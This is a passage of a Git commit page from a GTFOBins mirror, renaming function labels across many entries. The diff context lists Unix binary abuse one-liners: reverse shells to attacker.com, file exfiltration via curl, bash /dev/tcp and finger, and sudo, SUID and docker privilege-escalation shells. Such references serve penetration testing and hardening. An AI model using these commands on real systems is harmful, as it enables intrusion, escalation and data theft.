public-mirrors/GTFOBins.github.io
1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io synced 2025-10-31 08:48:54 +01:00
Code Issues Projects Releases Wiki Activity

Adopt new function names

Browse Source
This commit is contained in:
Emilio Pinna
2018-10-05 18:55:38 +01:00
parent 1c77f099d3
commit dd337b5ddf
110 changed files with 354 additions and 354 deletions
Download Patch File Download Diff File Expand all files Collapse all files

8
_data/functions.yml
View File

@@ -19,8 +19,8 @@ reverse-shell:
It can send back a reverse shell to a listening attacker to open a remote It can send back a reverse shell to a listening attacker to open a remote
network access. network access.
reverse-non-interactive-shell: non-interactive-reverse-shell:
label: Reverse non-interactive shell label: Non-interactive reverse shell
description: | description: |
It can send back a non-interactive reverse shell to a listening attacker to It can send back a non-interactive reverse shell to a listening attacker to
open a remote network access. open a remote network access.
@@ -30,8 +30,8 @@ bind-shell:
description: | description: |
It can bind a shell to a local port to allow remote network access. It can bind a shell to a local port to allow remote network access.
bind-non-interactive-shell: non-interactive-bind-shell:
label: Bind non-interactive shell label: Non-interactive bind shell
description: | description: |
It can bind a non-interactive shell to a local port to allow remote network It can bind a non-interactive shell to a local port to allow remote network
access. access.

4
_gtfobins/apt-get.md
View File

@@ -1,11 +1,11 @@
--- ---
description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply. description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
functions: functions:
execute-interactive: shell:
- code: | - code: |
apt-get changelog apt apt-get changelog apt
!/bin/sh !/bin/sh
sudo-enabled: sudo:
- code: | - code: |
sudo apt-get changelog apt sudo apt-get changelog apt
!/bin/sh !/bin/sh

4
_gtfobins/apt.md
View File

@@ -1,11 +1,11 @@
--- ---
description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply. description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
functions: functions:
execute-interactive: shell:
- code: | - code: |
apt-get changelog apt apt-get changelog apt
!/bin/sh !/bin/sh
sudo-enabled: sudo:
- code: | - code: |
sudo apt-get changelog apt sudo apt-get changelog apt
!/bin/sh !/bin/sh

6
_gtfobins/aria2c.md
View File

@@ -1,7 +1,7 @@
--- ---
description: Note that the subprocess is immediately sent to the background. description: Note that the subprocess is immediately sent to the background.
functions: functions:
execute-non-interactive: command:
- code: | - code: |
COMMAND='id' COMMAND='id'
TF=$(mktemp) TF=$(mktemp)
@@ -10,14 +10,14 @@ functions:
aria2c --on-download-error=$TF http://x aria2c --on-download-error=$TF http://x
- description: The remote file `aaaaaaaaaaaaaaaa` (must be a string of 16 hex digit) contains the shell script. Note that said file needs to be written on disk in order to be executed. `--allow-overwrite` is needed if this is executed multiple times with the same GID. - description: The remote file `aaaaaaaaaaaaaaaa` (must be a string of 16 hex digit) contains the shell script. Note that said file needs to be written on disk in order to be executed. `--allow-overwrite` is needed if this is executed multiple times with the same GID.
code: aria2c --allow-overwrite --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa code: aria2c --allow-overwrite --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa
suid-enabled: suid:
- code: | - code: |
COMMAND='id' COMMAND='id'
TF=$(mktemp) TF=$(mktemp)
echo "$COMMAND" > $TF echo "$COMMAND" > $TF
chmod +x $TF chmod +x $TF
./aria2c --on-download-error=$TF http://x ./aria2c --on-download-error=$TF http://x
sudo-enabled: sudo:
- code: | - code: |
COMMAND='id' COMMAND='id'
TF=$(mktemp) TF=$(mktemp)

6
_gtfobins/ash.md
View File

@@ -1,13 +1,13 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: ash - code: ash
file-write: file-write:
- code: | - code: |
export LFILE=file_to_write export LFILE=file_to_write
ash -c 'echo DATA > $LFILE' ash -c 'echo DATA > $LFILE'
suid-enabled: suid:
- code: "./ash" - code: "./ash"
sudo-enabled: sudo:
- code: sudo ash - code: sudo ash
--- ---

10
_gtfobins/awk.md
View File

@@ -1,8 +1,8 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: awk 'BEGIN {system("/bin/sh")}' - code: awk 'BEGIN {system("/bin/sh")}'
reverse-shell-non-interactive: non-interactive-reverse-shell:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
@@ -11,7 +11,7 @@ functions:
s = "/inet/tcp/0/" RHOST "/" RPORT; s = "/inet/tcp/0/" RHOST "/" RPORT;
while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break; while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
while (c && (c |& getline) > 0) print $0 |& s; close(c)}}' while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
bind-shell-non-interactive: non-interactive-bind-shell:
- description: Run `nc target.com 12345` on the attacker box to connect to the shell. - description: Run `nc target.com 12345` on the attacker box to connect to the shell.
code: | code: |
LPORT=12345 LPORT=12345
@@ -27,8 +27,8 @@ functions:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
awk '//' "$LFILE" awk '//' "$LFILE"
sudo-enabled: sudo:
- code: sudo awk 'BEGIN {system("/bin/sh")}' - code: sudo awk 'BEGIN {system("/bin/sh")}'
suid-limited: limited-suid:
- code: ./awk 'BEGIN {system("/bin/sh")}' - code: ./awk 'BEGIN {system("/bin/sh")}'
--- ---

4
_gtfobins/base64.md
View File

@@ -4,11 +4,11 @@ functions:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
base64 "$LFILE" | base64 --decode base64 "$LFILE" | base64 --decode
suid-enabled: suid:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./base64 "$LFILE" | base64 --decode ./base64 "$LFILE" | base64 --decode
sudo-enabled: sudo:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo base64 "$LFILE" | base64 --decode sudo base64 "$LFILE" | base64 --decode

12
_gtfobins/bash.md
View File

@@ -1,14 +1,14 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: bash - code: bash
reverse-shell-interactive: reverse-shell:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
export RPORT=12345 export RPORT=12345
bash -c 'bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1' bash -c 'bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1'
upload: file-upload:
- description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file. - description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
@@ -21,7 +21,7 @@ functions:
export RPORT=12345 export RPORT=12345
export LFILE=file_to_send export LFILE=file_to_send
bash -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT' bash -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'
download: file-download:
- description: Fetch a remote file via HTTP GET request. - description: Fetch a remote file via HTTP GET request.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
@@ -58,8 +58,8 @@ functions:
HISTTIMEFORMAT=$'\r\e[K' HISTTIMEFORMAT=$'\r\e[K'
history -r $LFILE history -r $LFILE
history history
suid-enabled: suid:
- code: "./bash -p" - code: "./bash -p"
sudo-enabled: sudo:
- code: sudo bash - code: sudo bash
--- ---

8
_gtfobins/busybox.md
View File

@@ -1,9 +1,9 @@
--- ---
description: BusyBox may contain many UNIX utilities, run `busybox --list-full` to check what GTFBins binaries are supported. Here some example. description: BusyBox may contain many UNIX utilities, run `busybox --list-full` to check what GTFBins binaries are supported. Here some example.
functions: functions:
execute-interactive: shell:
- code: busybox sh - code: busybox sh
upload: file-upload:
- description: Serve files in the local folder running an HTTP server. - description: Serve files in the local folder running an HTTP server.
code: | code: |
export LPORT=12345 export LPORT=12345
@@ -16,9 +16,9 @@ functions:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./busybox cat "$LFILE" ./busybox cat "$LFILE"
suid-enabled: suid:
- description: It may drop the SUID privileges depending on the compilation flags and the runtime configuration. - description: It may drop the SUID privileges depending on the compilation flags and the runtime configuration.
code: "./busybox sh" code: "./busybox sh"
sudo-enabled: sudo:
- code: sudo busybox sh - code: sudo busybox sh
--- ---

4
_gtfobins/cat.md
View File

@@ -4,11 +4,11 @@ functions:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
cat "$LFILE" cat "$LFILE"
suid-enabled: suid:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./cat "$LFILE" ./cat "$LFILE"
sudo-enabled: sudo:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo cat "$LFILE" sudo cat "$LFILE"

4
_gtfobins/chmod.md
View File

@@ -1,11 +1,11 @@
--- ---
description: This can be run with elevated privileges to change permissions and then read, write, or execute a file. description: This can be run with elevated privileges to change permissions and then read, write, or execute a file.
functions: functions:
suid-enabled: suid:
- code: | - code: |
LFILE=file_to_change LFILE=file_to_change
./chmod 0777 $LFILE ./chmod 0777 $LFILE
sudo-enabled: sudo:
- code: | - code: |
LFILE=file_to_change LFILE=file_to_change
sudo chmod 0777 $LFILE sudo chmod 0777 $LFILE

4
_gtfobins/chown.md
View File

@@ -1,11 +1,11 @@
--- ---
description: This can be run with elevated privileges to change ownership and then read, write, or execute a file. description: This can be run with elevated privileges to change ownership and then read, write, or execute a file.
functions: functions:
suid-enabled: suid:
- code: | - code: |
LFILE=file_to_change LFILE=file_to_change
./chown $(id -un):$(id -gn) $LFILE ./chown $(id -un):$(id -gn) $LFILE
sudo-enabled: sudo:
- code: | - code: |
LFILE=file_to_change LFILE=file_to_change
sudo chown $(id -un):$(id -gn) $LFILE sudo chown $(id -un):$(id -gn) $LFILE

4
_gtfobins/cp.md
View File

@@ -1,13 +1,13 @@
--- ---
description: This can be used to copy and then read or write files from a restricted file systems or with elevated privileges. description: This can be used to copy and then read or write files from a restricted file systems or with elevated privileges.
functions: functions:
suid-enabled: suid:
- code: | - code: |
LFILE=file_to_write LFILE=file_to_write
TF=$(mktemp) TF=$(mktemp)
echo "DATA" > $TF echo "DATA" > $TF
./cp $TF $LFILE ./cp $TF $LFILE
sudo-enabled: sudo:
- code: | - code: |
LFILE=file_to_write LFILE=file_to_write
TF=$(mktemp) TF=$(mktemp)

4
_gtfobins/cpulimit.md
View File

@@ -1,7 +1,7 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: cpulimit -l 100 -f /bin/sh - code: cpulimit -l 100 -f /bin/sh
sudo-enabled: sudo:
- code: sudo cpulimit -l 100 -f /bin/sh - code: sudo cpulimit -l 100 -f /bin/sh
--- ---

4
_gtfobins/crontab.md
View File

@@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-non-interactive: command:
- description: The commands are executed according to the crontab file edited via the `crontab` utility. - description: The commands are executed according to the crontab file edited via the `crontab` utility.
code: crontab -e code: crontab -e
sudo-enabled: sudo:
- description: The commands are executed according to the crontab file edited via the `crontab` utility. - description: The commands are executed according to the crontab file edited via the `crontab` utility.
code: sudo crontab -e code: sudo crontab -e
--- ---

6
_gtfobins/csh.md
View File

@@ -1,13 +1,13 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: csh - code: csh
file-write: file-write:
- code: | - code: |
export LFILE=file_to_write export LFILE=file_to_write
ash -c 'echo DATA > $LFILE' ash -c 'echo DATA > $LFILE'
suid-enabled: suid:
- code: "./csh -b" - code: "./csh -b"
sudo-enabled: sudo:
- code: sudo csh - code: sudo csh
--- ---

8
_gtfobins/curl.md
View File

@@ -1,12 +1,12 @@
--- ---
functions: functions:
upload: file-upload:
- description: Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Omit the `@` to send hard-coded data. - description: Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Omit the `@` to send hard-coded data.
code: | code: |
URL=http://attacker.com/ URL=http://attacker.com/
LFILE=file_to_send LFILE=file_to_send
curl -X POST -d @$file_to_send $URL curl -X POST -d @$file_to_send $URL
download: file-download:
- description: Fetch a remote file via HTTP GET request. - description: Fetch a remote file via HTTP GET request.
code: | code: |
URL=http://attacker.com/file_to_get URL=http://attacker.com/file_to_get
@@ -17,13 +17,13 @@ functions:
code: | code: |
LFILE=/tmp/file_to_read LFILE=/tmp/file_to_read
curl file://$LFILE curl file://$LFILE
suid-enabled: suid:
- description: Fetch a remote file via HTTP GET request. - description: Fetch a remote file via HTTP GET request.
code: | code: |
URL=http://attacker.com/file_to_get URL=http://attacker.com/file_to_get
LFILE=file_to_save LFILE=file_to_save
./curl $URL -o $LFILE ./curl $URL -o $LFILE
sudo-enabled: sudo:
- description: Fetch a remote file via HTTP GET request. - description: Fetch a remote file via HTTP GET request.
code: | code: |
URL=http://attacker.com/file_to_get URL=http://attacker.com/file_to_get

4
_gtfobins/cut.md
View File

@@ -4,11 +4,11 @@ functions:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
cut -d "" -f1 "$LFILE" cut -d "" -f1 "$LFILE"
suid-enabled: suid:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./cut -d "" -f1 "$LFILE" ./cut -d "" -f1 "$LFILE"
sudo-enabled: sudo:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo cut -d "" -f1 "$LFILE" sudo cut -d "" -f1 "$LFILE"

6
_gtfobins/dash.md
View File

@@ -1,13 +1,13 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: dash - code: dash
file-write: file-write:
- code: | - code: |
export LFILE=file_to_write export LFILE=file_to_write
ash -c 'echo DATA > $LFILE' ash -c 'echo DATA > $LFILE'
suid-enabled: suid:
- code: ./dash -p - code: ./dash -p
sudo-enabled: sudo:
- code: sudo dash - code: sudo dash
--- ---

4
_gtfobins/date.md
View File

@@ -8,11 +8,11 @@ functions:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
date -f $LFILE date -f $LFILE
suid-enabled: suid:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./date -f $LFILE ./date -f $LFILE
sudo-enabled: sudo:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo date -f $LFILE sudo date -f $LFILE

4
_gtfobins/dd.md
View File

@@ -8,11 +8,11 @@ functions:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
dd if=LFILE dd if=LFILE
suid-enabled: suid:
- code: | - code: |
LFILE=file_to_write LFILE=file_to_write
echo "data" | ./dd of=$LFILE echo "data" | ./dd of=$LFILE
sudo-enabled: sudo:
- code: | - code: |
LFILE=file_to_write LFILE=file_to_write
echo "data" | sudo -E dd of=$LFILE echo "data" | sudo -E dd of=$LFILE

4
_gtfobins/diff.md
View File

@@ -4,11 +4,11 @@ functions:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
diff --line-format=%L /dev/null $LFILE diff --line-format=%L /dev/null $LFILE
suid-enabled: suid:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./diff --line-format=%L /dev/null $LFILE ./diff --line-format=%L /dev/null $LFILE
sudo-enabled: sudo:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo diff --line-format=%L /dev/null $LFILE sudo diff --line-format=%L /dev/null $LFILE

4
_gtfobins/docker.md
View File

@@ -2,11 +2,11 @@
description: | description: |
Exploit the fact that Docker runs as root to create a SUID binary on the host using a container. This requires the user to be privileged enough to run docker, e.g. being in the `docker` group. Any other Docker Linux image should work, e.g., `debian`. Exploit the fact that Docker runs as root to create a SUID binary on the host using a container. This requires the user to be privileged enough to run docker, e.g. being in the `docker` group. Any other Docker Linux image should work, e.g., `debian`.
functions: functions:
sudo-enabled: sudo:
- code: | - code: |
sudo docker run --rm -v /home/$USER:/h_docs ubuntu \ sudo docker run --rm -v /home/$USER:/h_docs ubuntu \
sh -c 'cp /bin/sh /h_docs/ && chmod +s /h_docs/sh' && ~/sh -p sh -c 'cp /bin/sh /h_docs/ && chmod +s /h_docs/sh' && ~/sh -p
suid-enabled: suid:
- code: | - code: |
./docker run --rm -v /home/$USER:/h_docs ubuntu \ ./docker run --rm -v /home/$USER:/h_docs ubuntu \
sh -c 'cp /bin/sh /h_docs/ && chmod +s /h_docs/sh' && ~/sh -p sh -c 'cp /bin/sh /h_docs/ && chmod +s /h_docs/sh' && ~/sh -p

12
_gtfobins/easy_install.md
View File

@@ -1,11 +1,11 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: | - code: |
TF=$(mktemp -d) TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
easy_install $TF easy_install $TF
reverse-shell-interactive: reverse-shell:
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell. - description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
@@ -16,7 +16,7 @@ functions:
[os.dup2(s.fileno(),fd) for fd in (0,1,2)] [os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn("/bin/sh")' > $TF/setup.py pty.spawn("/bin/sh")' > $TF/setup.py
easy_install $TF easy_install $TF
upload: file-upload:
- description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file. - description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
code: | code: |
export URL=http://attacker.com/ export URL=http://attacker.com/
@@ -36,7 +36,7 @@ functions:
else: import SimpleHTTPServer as s, SocketServer as ss else: import SimpleHTTPServer as s, SocketServer as ss
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()' > $TF/setup.py ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()' > $TF/setup.py
easy_install $TF easy_install $TF
download: file-download:
- description: Fetch a remote file via HTTP GET request. The file path must be absolute. - description: Fetch a remote file via HTTP GET request. The file path must be absolute.
code: | code: |
export URL=http://attacker.com/file_to_get export URL=http://attacker.com/file_to_get
@@ -62,12 +62,12 @@ functions:
TF=$(mktemp -d) TF=$(mktemp -d)
echo 'print(open("file_to_read").read())' > $TF/setup.py echo 'print(open("file_to_read").read())' > $TF/setup.py
easy_install $TF easy_install $TF
load-library: library-load:
- code: | - code: |
TF=$(mktemp -d) TF=$(mktemp -d)
echo 'from ctypes import cdll; cdll.LoadLibrary("lib.so")' > $TF/setup.py echo 'from ctypes import cdll; cdll.LoadLibrary("lib.so")' > $TF/setup.py
easy_install $TF easy_install $TF
sudo-enabled: sudo:
- code: | - code: |
TF=$(mktemp -d) TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py

6
_gtfobins/ed.md
View File

@@ -1,6 +1,6 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: | - code: |
ed ed
!/bin/sh !/bin/sh
@@ -17,11 +17,11 @@ functions:
ed file_to_read ed file_to_read
,p ,p
q q
sudo-enabled: sudo:
- code: | - code: |
sudo ed sudo ed
!/bin/sh !/bin/sh
suid-limited: limited-suid:
- code: | - code: |
./ed ./ed
!/bin/sh !/bin/sh

6
_gtfobins/emacs.md
View File

@@ -1,6 +1,6 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: emacs -Q -nw --eval '(term "/bin/sh")' - code: emacs -Q -nw --eval '(term "/bin/sh")'
file-write: file-write:
- code: | - code: |
@@ -9,8 +9,8 @@ functions:
C-x C-s C-x C-s
file-read: file-read:
- code: emacs file_to_read - code: emacs file_to_read
suid-enabled: suid:
- code: ./emacs -Q -nw --eval '(term "/bin/sh -p")' - code: ./emacs -Q -nw --eval '(term "/bin/sh -p")'
sudo-enabled: sudo:
- code: sudo emacs -Q -nw --eval '(term "/bin/sh")' - code: sudo emacs -Q -nw --eval '(term "/bin/sh")'
--- ---

6
_gtfobins/env.md
View File

@@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: env /bin/sh - code: env /bin/sh
suid-enabled: suid:
- code: ./env /bin/sh -p - code: ./env /bin/sh -p
sudo-enabled: sudo:
- code: sudo env /bin/sh - code: sudo env /bin/sh
--- ---

4
_gtfobins/expand.md
View File

@@ -5,11 +5,11 @@ functions:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
expand "$LFILE" expand "$LFILE"
suid-enabled: suid:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./expand "$LFILE" ./expand "$LFILE"
sudo-enabled: sudo:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo expand "$LFILE" sudo expand "$LFILE"

6
_gtfobins/expect.md
View File

@@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: expect -c 'spawn /bin/sh;interact' - code: expect -c 'spawn /bin/sh;interact'
suid-enabled: suid:
- code: ./expect -c 'spawn /bin/sh -p;interact' - code: ./expect -c 'spawn /bin/sh -p;interact'
sudo-enabled: sudo:
- code: sudo expect -c 'spawn /bin/sh;interact' - code: sudo expect -c 'spawn /bin/sh;interact'
--- ---

4
_gtfobins/facter.md
View File

@@ -1,11 +1,11 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: | - code: |
TF=$(mktemp -d) TF=$(mktemp -d)
echo 'exec("/bin/sh")' > $TF/x.rb echo 'exec("/bin/sh")' > $TF/x.rb
FACTERLIB=$TF facter FACTERLIB=$TF facter
sudo-enabled: sudo:
- code: | - code: |
TF=$(mktemp -d) TF=$(mktemp -d)
echo 'exec("/bin/sh")' > $TF/x.rb echo 'exec("/bin/sh")' > $TF/x.rb

6
_gtfobins/find.md
View File

@@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: find . -exec /bin/sh \; -quit - code: find . -exec /bin/sh \; -quit
suid-enabled: suid:
- code: ./find . -exec /bin/sh -p \; -quit - code: ./find . -exec /bin/sh -p \; -quit
sudo-enabled: sudo:
- code: sudo find . -exec /bin/sh \; -quit - code: sudo find . -exec /bin/sh \; -quit
--- ---

4
_gtfobins/finger.md
View File

@@ -2,13 +2,13 @@
description: | description: |
`finger` hangs waiting for the remote peer to close the socket. `finger` hangs waiting for the remote peer to close the socket.
functions: functions:
upload: file-upload:
- description: Send a binary file to a TCP port. Run `sudo nc -l -p 79 | base64 -d > "file_to_save"` on the attacker box to collect the file. The file length is limited by the maximum size of arguments. - description: Send a binary file to a TCP port. Run `sudo nc -l -p 79 | base64 -d > "file_to_save"` on the attacker box to collect the file. The file length is limited by the maximum size of arguments.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
LFILE=file_to_send LFILE=file_to_send
finger "$(base64 $LFILE)@$RHOST" finger "$(base64 $LFILE)@$RHOST"
download: file-download:
- description: Fetch remote binary file from a remote TCP port. Run `base64 "file_to_send" | sudo nc -l -p 79` on the attacker box to send the file. - description: Fetch remote binary file from a remote TCP port. Run `base64 "file_to_send" | sudo nc -l -p 79` on the attacker box to send the file.
code: | code: |
RHOST=attacker.com RHOST=attacker.com

6
_gtfobins/flock.md
View File

@@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: flock -u / /bin/sh - code: flock -u / /bin/sh
suid-enabled: suid:
- code: ./flock -u / /bin/sh -p - code: ./flock -u / /bin/sh -p
sudo-enabled: sudo:
- code: sudo flock -u / /bin/sh - code: sudo flock -u / /bin/sh
--- ---

4
_gtfobins/fmt.md
View File

@@ -5,11 +5,11 @@ functions:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
fmt -pNON_EXISTING_PREFIX "$LFILE" fmt -pNON_EXISTING_PREFIX "$LFILE"
suid-enabled: suid:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./fmt -pNON_EXISTING_PREFIX "$LFILE" ./fmt -pNON_EXISTING_PREFIX "$LFILE"
sudo-enabled: sudo:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo fmt -pNON_EXISTING_PREFIX "$LFILE" sudo fmt -pNON_EXISTING_PREFIX "$LFILE"

4
_gtfobins/fold.md
View File

@@ -4,11 +4,11 @@ functions:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
fold -w99999999 "$LFILE" fold -w99999999 "$LFILE"
suid-enabled: suid:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./fold -w99999999 "$LFILE" ./fold -w99999999 "$LFILE"
sudo-enabled: sudo:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo fold -w99999999 "$LFILE" sudo fold -w99999999 "$LFILE"

8
_gtfobins/ftp.md
View File

@@ -1,22 +1,22 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: | - code: |
ftp ftp
!/bin/sh !/bin/sh
upload: file-upload:
- description: Send local file to a FTP server. - description: Send local file to a FTP server.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
ftp $RHOST ftp $RHOST
put file_to_send put file_to_send
download: file-download:
- description: Fetch a remote file from a FTP server. - description: Fetch a remote file from a FTP server.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
ftp $RHOST ftp $RHOST
get file_to_get get file_to_get
sudo-enabled: sudo:
- code: | - code: |
sudo ftp sudo ftp
!/bin/sh !/bin/sh

14
_gtfobins/gdb.md
View File

@@ -1,8 +1,8 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: gdb -nx -ex '!sh' -ex quit - code: gdb -nx -ex '!sh' -ex quit
reverse-shell-interactive: reverse-shell:
- description: This requires that GDB is compiled with Python support. Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell. - description: This requires that GDB is compiled with Python support. Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
@@ -11,7 +11,7 @@ functions:
s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))) s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)] [os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn("/bin/sh")' -ex quit pty.spawn("/bin/sh")' -ex quit
upload: file-upload:
- description: This requires that GDB is compiled with Python support. Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file. - description: This requires that GDB is compiled with Python support. Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
code: | code: |
export URL=http://attacker.com/ export URL=http://attacker.com/
@@ -27,7 +27,7 @@ functions:
if sys.version_info.major == 3: import http.server as s, socketserver as ss if sys.version_info.major == 3: import http.server as s, socketserver as ss
else: import SimpleHTTPServer as s, SocketServer as ss else: import SimpleHTTPServer as s, SocketServer as ss
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()' -ex quit ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()' -ex quit
download: file-download:
- description: This requires that GDB is compiled with Python support. Fetch a remote file via HTTP GET request. - description: This requires that GDB is compiled with Python support. Fetch a remote file via HTTP GET request.
code: | code: |
export URL=http://attacker.com/file_to_get export URL=http://attacker.com/file_to_get
@@ -44,12 +44,12 @@ functions:
file-read: file-read:
- description: This requires that GDB is compiled with Python support. - description: This requires that GDB is compiled with Python support.
code: gdb -nx -ex 'python print(open("file_to_read").read())' -ex quit code: gdb -nx -ex 'python print(open("file_to_read").read())' -ex quit
load-library: library-load:
- description: This requires that GDB is compiled with Python support. - description: This requires that GDB is compiled with Python support.
code: gdb -nx -ex 'python from ctypes import cdll; cdll.LoadLibrary("lib.so")' -ex quit code: gdb -nx -ex 'python from ctypes import cdll; cdll.LoadLibrary("lib.so")' -ex quit
sudo-enabled: sudo:
- code: sudo gdb -nx -ex '!sh' -ex quit - code: sudo gdb -nx -ex '!sh' -ex quit
capabilities-enabled: capabilities:
- description: This requires that GDB is compiled with Python support. - description: This requires that GDB is compiled with Python support.
code: ./gdb -nx -ex 'python import os; os.setuid(0)' -ex '!sh' -ex quit code: ./gdb -nx -ex 'python import os; os.setuid(0)' -ex '!sh' -ex quit
--- ---

6
_gtfobins/git.md
View File

@@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: PAGER='sh -c "exec sh 0<&1"' git -p help - code: PAGER='sh -c "exec sh 0<&1"' git -p help
sudo-enabled: sudo:
- code: PAGER='sh -c "exec sh 0<&1"' sudo -E git -p help - code: PAGER='sh -c "exec sh 0<&1"' sudo -E git -p help
suid-limited: limited-suid:
- code: PAGER='sh -c "exec sh 0<&1"' ./git -p help - code: PAGER='sh -c "exec sh 0<&1"' ./git -p help
--- ---

4
_gtfobins/grep.md
View File

@@ -6,11 +6,11 @@ functions:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
grep '' $LFILE grep '' $LFILE
suid-enabled: suid:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./grep '' $LFILE ./grep '' $LFILE
sudo-enabled: sudo:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo grep '' $LFILE sudo grep '' $LFILE

4
_gtfobins/head.md
View File

@@ -4,11 +4,11 @@ functions:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
